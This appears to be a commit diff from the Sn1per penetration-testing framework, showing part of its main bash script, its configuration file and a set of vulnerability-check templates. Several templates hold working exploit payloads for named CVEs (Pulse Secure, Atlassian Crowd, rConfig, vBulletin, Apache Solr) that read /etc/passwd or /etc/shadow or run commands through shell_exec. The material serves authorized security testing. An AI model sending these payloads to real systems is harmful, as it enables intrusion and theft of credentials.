cd $LOOT_DIR/nmap/ && rm -f openports-all-sorted-* 2> /dev/null
cd $LOOT_DIR/nmap/ && rm -f livehosts-all-sorted-* 2> /dev/null
cd $LOOT_DIR/web/ 2> /dev/null
egrep -Hi 'HTTP/1.' headers-* 2> /dev/null | cut -d':' -f1 | sed "s/headers\-http\(\|s\)\-//g" | sed "s/\.txt//g" | cut -d \- -f1 | sort -u 2> /dev/null > $LOOT_DIR/web/webhosts-sorted.txt 2> /dev/null
split -d -l $MAX_HOSTS -e $LOOT_DIR/web/webhosts-sorted.txt webhosts-all-sorted- 2> /dev/null
cd $LOOT_DIR/domains/ 2> /dev/null
split -d -l $MAX_HOSTS -e $LOOT_DIR/domains/domains-all-sorted.txt domains-all-sorted- 2> /dev/null
cd $LOOT_DIR/nmap/ 2> /dev/null
split -d -l $MAX_HOSTS -e $LOOT_DIR/nmap/openports-sorted.txt openports-all-sorted- 2> /dev/null
split -d -l $MAX_HOSTS -e $LOOT_DIR/nmap/livehosts-sorted.txt livehosts-all-sorted- 2> /dev/null
echo -e "$OKORANGE + -- --=[ Removing blank screenshots and files...$RESET"
chmod 777 -Rf $LOOT_DIR 2> /dev/null
cd $LOOT_DIR/screenshots/
find $LOOT_DIR/screenshots/ -type f -size -9000c -exec rm -f {} \;
find $LOOT_DIR/nmap/ -type f -size -1c -exec rm -f {} \;
find $LOOT_DIR/ips/ -type f -size -1c -exec rm -f {} \;
find $LOOT_DIR/osint/ -type f -size -1c -exec rm -f {} \;
find $LOOT_DIR/vulnerabilities/ -type f -size -1c -exec rm -f {} \;
cd $LOOT_DIR
if [[ -f $SNIPER_PRO ]]; then
wc -l $LOOT_DIR/scans/notifications.txt 2> /dev/null | awk '{print $1}' > $LOOT_DIR/scans/notifications_total.txt 2> /dev/null
wc -l $LOOT_DIR/scans/notifications_new.txt 2> /dev/null | awk '{print $1}' > $LOOT_DIR/scans/notifications_new_total.txt 2> /dev/null
cat $LOOT_DIR/scans/tasks-running.txt 2> /dev/null > $LOOT_DIR/scans/tasks-running_total.txt 2> /dev/null
wc -l $LOOT_DIR/scans/tasks.txt 2> /dev/null | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/tasks_total.txt 2> /dev/null
wc -l $LOOT_DIR/scans/scheduled/*.sh 2> /dev/null | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/scheduled_tasks_total.txt 2> /dev/null
grep "Host\ status" $LOOT_DIR/scans/notifications.txt 2> /dev/null | wc -l | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/host_status_changes_total.txt 2> /dev/null
grep "Port\ change" $LOOT_DIR/scans/notifications.txt 2> /dev/null | wc -l | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/port_changes_total.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains_new-*.txt 2> /dev/null | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/domain_changes_total.txt 2> /dev/null
cat $LOOT_DIR/web/dirsearch-new-*.txt $LOOT_DIR/web/spider-new-*.txt 2> /dev/null | wc -l | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/url_changes_total.txt 2> /dev/null
if [[ -f "$LOOT_DIR/notes/notepad.html" ]]; then
echo -n "" 2>/dev/null
else
cp "$INSTALL_DIR/pro/notepad.html" "$LOOT_DIR/notes/notepad.html" 2>/dev/null
PRE_NAME=$(echo $WORKSPACE | sed "s/\./-/g")
sed -i "s/notepad/notepad-$PRE_NAME/g" "$LOOT_DIR/notes/notepad.html" 2> /dev/null
fi
if [[ "$SN1PER_AUTOLOAD" = "1" ]] && [[ ! -f "$INSTALL_DIR/pro/settings.php" ]]; then
echo -e "$OKORANGE + -- --=[ Loading Sn1per Professional...$RESET"
source $INSTALL_DIR/pro.sh
sudo $LAST_USER -c $BROWSER $LOOT_DIR/sniper-report.html 2> /dev/null > /dev/null &
else
echo -e "$OKORANGE + -- --=[ Generating Sn1per Professional reports...$RESET"
source $INSTALL_DIR/pro.sh
fi
else
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET ⚡ Upgrade to Sn1per Professional and unlock a world of powerful benefits! 🚀 $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET 💡 Don't miss out on important updates by using the Community version. $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET 🔝 The latest Professional version ( ${OKRED}10.8 ${RESET}) offers unparalleled features, including: $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET 💻 Sleek Web UI $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET 🛠️ Extensive add-ons $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET 🔄 Seamless integrations $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET 🤝 Experience priority support, continuous updates, and enhanced capabilities tailored for professionals like you. $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET 💰 Maximize your investment and achieve exceptional results with Sn1per Professional. $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET 🔍 Learn more about the differences between the versions at: ${OKBLUE}https://sn1persecurity.com/wordpress/sn1per-community-vs-professional-whats-the-difference/ $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET 🛒 Purchase your Sn1per Professional license now at: ${OKBLUE}https://sn1persecurity.com/ $RESET"
sudo $LAST_USER -c $BROWSER https://sn1persecurity.com 2> /dev/null > /dev/null &
fi
rm -f $UPDATED_TARGETS 2> /dev/null
touch $UPDATED_TARGETS 2> /dev/null
echo -e "$OKORANGE + -- --=[ Done!$RESET"
fi
}
if [[ "$REIMPORT" = "1" ]]; then
if [[ ! -z "$WORKSPACE_DIR" ]]; then
LOOT="1"
loot
exit
fi
fi
if [[ "$REIMPORT_ALL" = "1" ]]; then
if [[ ! -z "$WORKSPACE_DIR" ]]; then
touch $WORKSPACE_DIR/domains/targets.txt $WORKSPACE_DIR/domains/targets-all-sorted.txt $WORKSPACE_DIR/domains/domains-all-sorted.txt
cat $WORKSPACE_DIR/domains/targets.txt $WORKSPACE_DIR/domains/targets-all-sorted.txt $WORKSPACE_DIR/domains/domains-all-sorted.txt | sort -u > $WORKSPACE_DIR/scans/updated.txt
rm -f $WORKSPACE_DIR/nmap/openports-unsorted.txt 2> /dev/null
rm -f $WORKSPACE_DIR/nmap/openports-sorted.txt 2> /dev/null
rm -f $WORKSPACE_DIR/reports/host-table-report.csv 2> /dev/null
LOOT="1"
loot
exit
fi
fi
if [[ "$RELOAD" = "1" ]]; then
if [[ ! -z "$WORKSPACE_DIR" ]]; then
$BROWSER $WORKSPACE_DIR/sniper-report.html 2> /dev/null > /dev/null &
exit
fi
fi
if [[ ${TARGET:0:1} =~ $REGEX ]];
then
SCAN_TYPE="IP"
else
SCAN_TYPE="DOMAIN"
fi
# INITILIZE
init
if [[ ! -f /tmp/update-check.txt ]]; then
# CHECK CONNECTION STATUS
check_online
fi
if [[ ! -f /tmp/update-check.txt ]]; then
# CHECK FOR UPDATES
check_update
fi
# CHECK FOR BLACKARCH LINUX
if grep -q BlackArch /etc/issue; then
DISTRO='blackarch'
echo "Detected BlackArch GNU/Linux"
INSTALL_DIR=$(pwd)
echo "Setting current path to $INSTALL_DIR"
fi
source modes/discover.sh
source modes/flyover.sh
source modes/vulnscan.sh
source modes/fullportonly.sh
source modes/web.sh
source modes/webporthttp.sh
source modes/webporthttps.sh
source modes/webscan.sh
source modes/massweb.sh
source modes/masswebscan.sh
source modes/massvulnscan.sh
source modes/massportscan.sh
source modes/stealth.sh
source modes/airstrike.sh
source modes/nuke.sh
source modes/normal.sh
rm -f /tmp/update-check.txt 2> /dev/null
exit 0

251
sniper.conf Normal file
View File

@@ -0,0 +1,251 @@
INSTALL_DIR="/usr/share/sniper"
SNIPER_PRO=$INSTALL_DIR/pro.sh
PLUGINS_DIR="$INSTALL_DIR/plugins"
# COLORS
OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
RESET='\e[0m'
REGEX='^[0-9]+$'
# AUX MODE OVERRIDE
# AUTO_BRUTE="0"
# FULLNMAPSCAN="0"
# OSINT="0"
VULNSCAN="0"
# DEFAULT SETTINGS
ENABLE_AUTO_UPDATES="1"
REPORT="1"
LOOT="1"
# OUT OF SCOPE
OUT_OF_SCOPE=("www.sn1persecurity.com" "sn1persecurity.com" "*.sn1persecurity.com")
# SN1PER PROFESSIONAL SETTINGS
SNIPER_PRO_CONSOLE_OUTPUT="0"
SN1PER_AUTOLOAD="0"
MAX_HOSTS="2000"
# DEFAULT BROWSER
BROWSER="firefox"
# BURP 2.0 SCANNER CONFIG
BURP_HOST="127.0.0.1"
BURP_PORT="1338"
# OPENVAS CONFIG
OPENVAS="0"
OPENVAS_HOST="127.0.0.1"
OPENVAS_PORT="9390"
OPENVAS_USERNAME="admin"
OPENVAS_PASSWORD=""
OPENVAS_RUNAS_USER="kali"
# NESSUS CONFIG
NESSUS="0"
NESSUS_HOST="127.0.0.1:8834"
NESSUS_USERNAME="admin"
NESSUS_PASSWORD=""
NESSUS_POLICY_ID="c3cbcd46-329f-a9ed-1077-554f8c2af33d0d44f09d736969bf"
# METASPLOIT SCANNER CONFIG
METASPLOIT_IMPORT="0"
MSF_LHOST="127.0.0.1"
MSF_LPORT="4444"
# SHODAN API KEY
SHODAN_API_KEY=""
# CENSYS API KEYS
CENSYS_APP_ID=""
CENSYS_API_SECRET=""
# HUNTER.IO API KEY
HUNTERIO_KEY=""
# TOMBA.IO API
TOMBAIO_KEY=""
TOMBAIO_SECRET=""
# GITHUB API KEY
GITHUB_API_KEY=""
# WPSCAN API KEY
WP_API_KEY=""
# SLACK API
SLACK_NOTIFICATIONS="0"
SLACK_NOTIFICATIONS_THEHARVESTER="0"
SLACK_NOTIFICATIONS_EMAIL_SECURITY="0"
SLACK_NOTIFICATIONS_DOMAINS_NEW="0"
SLACK_NOTIFICATIONS_TAKEOVERS_NEW="0"
SLACK_NOTIFICATIONS_SUBOVER_NEW="0"
SLACK_NOTIFICATIONS_SUBJACK_NEW="0"
SLACK_NOTIFICATIONS_S3_BUCKETS="0"
SLACK_NOTIFICATIONS_SUBNETS="0"
SLACK_NOTIFICATIONS_DIRSEARCH_NEW="0"
SLACK_NOTIFICATIONS_SPIDER_NEW="0"
SLACK_NOTIFICATIONS_WHATWEB="0"
SLACK_NOTIFICATIONS_NMAP="0"
SLACK_NOTIFICATIONS_NMAP_DIFF="0"
SLACK_NOTIFICATIONS_BRUTEFORCE="0"
SLACK_NOTIFICATIONS_WHOIS="0"
SLACK_NOTIFICATIONS_METAGOOFIL="0"
SLACK_NOTIFICATIONS_ARACHNI_SCAN="0"
SLACK_NOTIFICATIONS_EMAIL_FORMAT="0"
# ACTIVE WEB BRUTE FORCE STAGES
WEB_BRUTE_STEALTHSCAN="1"
WEB_BRUTE_COMMONSCAN="1"
WEB_BRUTE_FULLSCAN="0"
WEB_BRUTE_EXPLOITSCAN="0"
WEB_JAVASCRIPT_ANALYSIS="1"
MAX_JAVASCRIPT_FILES="25"
# WEB BRUTE FORCE WORDLISTS
WEB_BRUTE_STEALTH="$INSTALL_DIR/wordlists/web-brute-stealth.txt"
WEB_BRUTE_COMMON="$INSTALL_DIR/wordlists/web-brute-common.txt"
WEB_BRUTE_FULL="$INSTALL_DIR/wordlists/web-brute-full.txt"
WEB_BRUTE_EXPLOITS="$INSTALL_DIR/wordlists/web-brute-exploits.txt"
WEB_BRUTE_EXTENSIONS="htm,html,asp,aspx,php,jsp,js"
WEB_BRUTE_EXCLUDE_CODES="400,403,404,405,406,429,500,502,503,504"
# GREP PATTERNS
STATIC_GREP_SEARCH="1"
GREP_MAX_LINES="10"
GREP_INTERESTING_SUBDOMAINS="admin|jenkins|test|proxy|stage|test|dev|devops|staff|db|qa|internal"
GREP_EXTENSIONS="\.action|\.adr|\.ascx|\.asmx|\.axd|\.backup|\.bak|\.bkf|\.bkp|\.bok|\.achee|\.cfg|\.cfm|\.cgi|\.cnf|\.conf|\.config|\.crt|\.csr|\.csv|\.dat|\.doc|\.docx|\.eml|\.env|\.exe|\.gz|\.ica|\.inf|\.ini|\.java|\.json|\.key|\.log|\.lst|\.mai|\.mbox|\.mbx|\.md|\.mdb|\.nsf|\.old|\.ora|\.pac|\.passwd|\.pcf|\.pdf|\.pem|\.pgp|\.pl| plist|\.pwd|\.rdp|\.reg|\.rtf|\.skr|\.sql|\.swf|\.tpl|\.txt|\.url|\.wml|\.xls|\.xlsx|\.xml|\.xsd|\.yml"
GREP_PARAMETERS="template=|preview=|id=|view=|activity=|name=|content=|redirect=|(&|[?])access(&|=)|(&|[?])admin(&|=)|(&|[?])dbg(&|=)|(&|[?])debug(&|=)|(&|[?])edit(&|=)|(&|[?])grant(&|=)|(&|[?])test(&|=)|(&|[?])alter(&|=)|(&|[?])clone(&|=)|(&|[?])create(&|=)|(&|[?])delete(&|=)|(&|[?])disable(&|=)|(&|[?])enable(&|=)|(&|[?])exec(&|=)|(&|[?])execute(&|=)|(&|[?])load(&|=)|(&|[?])make(&|=)|(&|[?])modify(&|=)|(&|[?])rename(&|=)|(&|[?])reset(&|=)|(&|[?])shell(&|=)|(&|[?])toggle(&|=)|(&|[?])adm(&|=)|(&|[?])root(&|=)|(&|[?])cfg(&|=)|(&|[?])dest(&|=)|(&|[?])redirect(&|=)|(&|[?])uri(&|=)|(&|[?])path(&|=)|(&|[?])continue(&|=)|(&|[?])url(&|=)|(&|[?])window(&|=)|(&|[?])next(&|=)|(&|[?])data(&|=)|(&|[?])reference(&|=)|(&|[?])site(&|=)|(&|[?])html(&|=)|(&|[?])val(&|=)|(&|[?])validate(&|=)|(&|[?])domain(&|=)|(&|[?])callback(&|=)|(&|[?])return(&|=)|(&|[?])feed(&|=)|(&|[?])host(&|=)|(&|[?])port(&|=)|(&|[?])to(&|=)|(&|[?])out(&|=)|(&|[?])view(&|=)|(&|[?])dir(&|=)|(&|[?])show(&|=)|(&|[?])navigation(&|=)|(&|[?])open(&|=)|(&|[?])file(&|=)|(&|[?])document(&|=)|(&|[?])folder(&|=)|(&|[?])pg(&|=)|(&|[?])php_path(&|=)|(&|[?])style(&|=)|(&|[?])doc(&|=)|(&|[?])img(&|=)|(&|[?])filename(&|=)|id=|select=|report=|role=|update=|query=|user=|name=|sort=|where=|search=|params=|process=|row=|view=|table=|from=|sel=|results=|sleep=|fetch=|order=|keyword=|column=|field=|delete=|string=|number=|filter=|(&|[?])callback=|(&|[?])cgi-bin/redirect.cgi|(&|[?])checkout=|(&|[?])checkout_url=|(&|[?])continue=|(&|[?])data=|(&|[?])dest=|(&|[?])destination=|(&|[?])dir=|(&|[?])domain=|(&|[?])feed=|(&|[?])file=|(&|[?])file_name=|(&|[?])file_url=|(&|[?])folder=|(&|[?])folder_url=|(&|[?])forward=|(&|[?])from_url=|(&|[?])go=|(&|[?])goto=|(&|[?])host=|(&|[?])html=|(&|[?])image_url=|(&|[?])img_url=|(&|[?])load_file=|(&|[?])load_url=|(&|[?])login_url=|(&|[?])logout=|(&|[?])navigation=|(&|[?])next=|(&|[?])next_page=|(&|[?])Open=|(&|[?])out=|(&|[?])page_url=|(&|[?])path=|(&|[?])port=|(&|[?])redir=|(&|[?])redirect=|(&|[?])redirect_to=|(&|[?])redirect_uri=|(&|[?])redirect_url=|(&|[?])reference=|(&|[?])return=|(&|[?])return_path=|(&|[?])return_to=|(&|[?])returnTo=|(&|[?])return_url=|(&|[?])rt=|(&|[?])rurl=|(&|[?])show=|(&|[?])site=|(&|[?])target=|(&|[?])to=|(&|[?])uri=|(&|[?])url=|(&|[?])val=|(&|[?])validate=|(&|[?])view=|(&|[?])window=|daemon=|upload=|dir=|execute=|download=|log=|ip=|cli=|cmd=|file=|document=|folder=|root=|path=|pg=|style=|pdf=|template=|php_path=|doc=|page=|name=|id=|user=|account=|number=|order=|no=|doc=|key=|email=|group=|profile=|edit=|report=|access=|admin=|dbg=|debug=|edit=|grant=|test=|alter=|clone=|create=|delete=|disable=|enable=|exec=|execute=|load=|make=|modify=|rename=|reset=|shell=|toggle=|adm=|root=|cfg=|config="
GREP_XSS="q=|s=|search=|lang=|keyword=|query=|page=|keywords=|year=|view=|email=|type=|name=|p=|callback=|jsonp=|api_key=|api=|password=|email=|emailto=|token=|username=|csrf_token=|unsubscribe_token=|id=|item=|page_id=|month=|immagine=|list_type=|url=|terms=|categoryid=|key=|l=|begindate=|enddate="
GREP_SSRF="access|admin|dbg|debug|edit|grant|test|alter|clone|create|delete|disable|enable|exec|execute|load|make|modify|rename|reset|shell|toggle|adm|root|cfg|dest|redirect|uri|path|continue|url|window|next|data|reference|site|html|val|validate|domain|callback|return|page|feed|host|port|to|out|view|dir|show|navigation|open"
GREP_REDIRECT="forward=|dest=|redirect=|uri=|path=|continue=|url=|window=|to=|out=|view=|dir=|show=|navigation=|Open=|file=|val=|validate=|domain=|callback=|return=|page=|feed=|host=|port=|next=|data=|reference=|site=|html="
GREP_RCE="daemon|upload|dir|execute|download|log|ip|cli|cmd"
GREP_IDOR="id|user|account|number|order|no|doc|key|email|group|profile|edit|report"
GREP_SQL="id|select|report|role|update|query|user|name|sort|where|search|params|process|row|view|table|from|sel|results|sleep|fetch|order|keyword|column|field|delete|string|number|filter"
GREP_LFI="file|document|folder|root|path|pg|style|pdf|template|php_path|doc"
GREP_SSTI="template|preview|id|view|activity|name|content|redirect"
GREP_DEBUG="access|admin|dbg|debug|edit|grant|test|alter|clone|create|delete|disable|enable|exec|execute|load|make|modify|rename|reset|shell|toggle|adm|root|cfg|config"
# DOMAIN WORDLISTS
DOMAINS_QUICK="$INSTALL_DIR/wordlists/domains-quick.txt"
DOMAINS_DEFAULT="$INSTALL_DIR/wordlists/domains-default.txt"
# DOMAINS_FULL="$INSTALL_DIR/wordlists/domains-all.txt"
# DEFAULT USER/PASS WORDLISTS
USER_FILE="/usr/share/brutex/wordlists/simple-users.txt"
PASS_FILE="/usr/share/brutex/wordlists/password.lst"
DNS_FILE="/usr/share/brutex/wordlists/namelist.txt"
# TOOL DIRECTORIES
SAMRDUMP="$INSTALL_DIR/bin/samrdump.py"
INURLBR="$INSTALL_DIR/bin/inurlbr.php"
# FLYOVER MODE TUNING
FLYOVER_MAX_HOSTS="5"
FLYOVER_DELAY="10"
# NMAP OPTIONS
NMAP_OPTIONS="--script-args http.useragent='' --open"
# NMAP PORT CONFIGURATIONS
QUICK_PORTS="21,22,80,443,8000,8080,8443"
DEFAULT_PORTS="10000,1099,110,111,123,135,137,139,1433,1524,161,162,16992,2049,21,2121,2181,22,23,25,264,27017,27018,27019,28017,3128,3306,3310,3389,3632,389,443,4443,445,49152,49180,500,512,513,514,53,5432,5555,5800,5900,5984,623,624,6667,67,68,69,7001,79,80,8000,8001,8080,8180,8443,8888,9200,9495"
FULL_PORTSCAN_PORTS="T:1-65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:500,U:520,U:2049"
THREADS="100"
# NETWORK PLUGINS
NMAP_SCRIPTS="1"
METASPLOIT_EXPLOIT="1"
MSF_LEGACY_WEB_EXPLOITS="0"
SSH_AUDIT="1"
SSH_ENUM="1"
LIBSSH_BYPASS="1"
SMTP_USER_ENUM="1"
FINGER_TOOL="1"
SHOW_MOUNT="1"
RPC_INFO="1"
SMB_ENUM="1"
AMAP="0"
# OSINT PLUGINS
WHOIS="1"
GOOHAK="1"
INURLBR="1"
THEHARVESTER="1"
METAGOOFIL="1"
HUNTERIO="0"
TOMBAIO="0"
INTODNS="1"
EMAILFORMAT="1"
ULTRATOOLS="1"
URLCRAZY="1"
VHOSTS="0"
H8MAIL="0"
GITHUB_SECRETS="0"
URLSCANIO="1"
# DYNAMIC APPLICATION SCANNERS
BURP_SCAN="0"
ARACHNI_SCAN="0"
ZAP_SCAN="0"
# ACTIVE WEB PLUGINS
SC0PE_VULNERABLITY_SCANNER="1"
NUCLEI="1"
DIRSEARCH="1"
GOBUSTER="0"
NIKTO="0"
BLACKWIDOW="1"
INJECTX="1"
CLUSTERD="0"
WPSCAN="0"
CMSMAP="0"
WAFWOOF="1"
WHATWEB="1"
WIG="0"
SHOCKER="0"
JEXBOSS="0"
WEBTECH="1"
SSL_INSECURE="1"
HTTP_PROBE="0"
SMUGGLER="1"
# PASSIVE WEB PLUGINS
WAYBACKMACHINE="1"
SSL="1"
PASSIVE_SPIDER="1"
GAU="1"
HACKERTARGET="1"
CUTYCAPT="0"
WEBSCREENSHOT="1"
# EMAIL PLUGINS
SPOOF_CHECK="1"
# RECON PLUGINS
SUBHIJACK_CHECK="0"
AQUATONE="0"
SLURP="0"
SUBLIST3R="0"
AMASS="0"
SUBFINDER="0"
DNSCAN="0"
CRTSH="1"
SUBOVER="0"
PROJECT_SONAR="1"
CENSYS_SUBDOMAINS="0"
SUBNET_RETRIEVAL="1"
SUBJACK="0"
ALT_DNS="0"
MASS_DNS="0"
DNSGEN="0"
SHODAN="0"
ASN_CHECK="1"
SPYSE="0"
SUBBRUTE_DNS="0"
GITHUB_SUBDOMAINS="0"
RAPIDDNS="1"
SCAN_ALL_DISCOVERED_DOMAINS="0"

9
templates/active/AWS_S3_Public_Bucket_Listing.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='AWS S3 Public Bucket Listing'
URI=''
METHOD='GET'
MATCH="listbucket"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/ApPHP_MicroBlog_Remote_Code_Execution_Vulnerability.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='ApPHP MicroBlog Remote Code Execution Vulnerability'
URI='/index.php?b);phpinfo();echo(base64_decode('T3BlblZBUwo')=/'
METHOD='GET'
MATCH="<title>phpinfo\(\)"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/Apache_Solr_Scanner.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Apache Solr Detected'
URI=''
METHOD='GET'
MATCH="Solr\ Admin"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/Apache_Tomcat_Scanner.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Apache Tomcat Detected'
URI='/404_DOES_NOT_EXIST'
METHOD='GET'
MATCH="Apache\ Tomcat\/[0-9]?[0-9]\.[0-9]?[0-9]\.[0-9]?[0-9]"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-o'

9
templates/active/AvantFAX_LOGIN_Detected.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='AvantFAX LOGIN Detected'
URI=''
METHOD='GET'
MATCH="AvantFAX\ LOGIN"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2018-13379_-_Fortigate_Pulse_Connect_Secure_Directory_Traversal.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2018-13379 - Fortigate Pulse Connect Secure Directory Traversal'
URI='/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'
METHOD='GET'
MATCH='\.\.\.\.\.\.\.\.\.\.\.\.\.'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-11510_-_Pulse_Connect_Secure_SSL_VPN_Arbitrary_File_Read.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-11510 - Pulse Connect Secure SSL VPN Arbitrary File Read'
URI='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-11580_-_Atlassian_Crowd_Data_Center_Unauthenticated_RCE.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-11580 - Atlassian Crowd Data Center Unauthenticated RCE'
URI='/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-11581_-_Jira_Template_Injection.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-11581 - Jira Template Injection'
URI='/secure/ContactAdministrators!default.jspa'
METHOD='GET'
MATCH='Contact Site Administrators'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-1653_-_Cisco_RV320_RV326_Configuration_Disclosure.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-1653 - Cisco RV320 RV326 Configuration Disclosure'
URI="/cgi-bin/config.exp"
METHOD='GET'
MATCH="sysconfig"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-16662_-_rConfig_3.9.2_Remote_Code_Execution.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-16662 - rConfig 3.9.2 Remote Code Execution'
URI='/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P1 - CRITICAL'
CURL_OPTS='--user-agent "" -s -L --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-16759 - vBulletin 5.x 0-Day Pre-Auth Remote Command Execution'
URI='/'
METHOD='POST'
MATCH='1787569'
SEVERITY='P1 - CRITICAL'
CURL_OPTS='-d "routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+shell_exec%28%27echo+$((1%2B1787568))%27%29%3B+exit%3B" -H "Content-Type: application/x-www-form-urlencoded" --user-agent "" -s -L --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution_Bypass.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-16759 - vBulletin 5.x 0-Day Pre-Auth Remote Command Execution Bypass'
URI='/ajax/render/widget_tabbedcontainer_tab_panel'
METHOD='POST'
MATCH='PHP\ Version'
SEVERITY='P1 - CRITICAL'
CURL_OPTS='-d "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();" -H "Content-Type: application/x-www-form-urlencoded" --user-agent "" -s -L --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-17558_-_Apache_Solr_RCE.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-17558 - Apache Solr RCE'
URI='/solr/dovecot/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

14
templates/active/CVE-2019-19719_Tableau_Server_DOM_XSS.py Normal file
View File

@@ -0,0 +1,14 @@
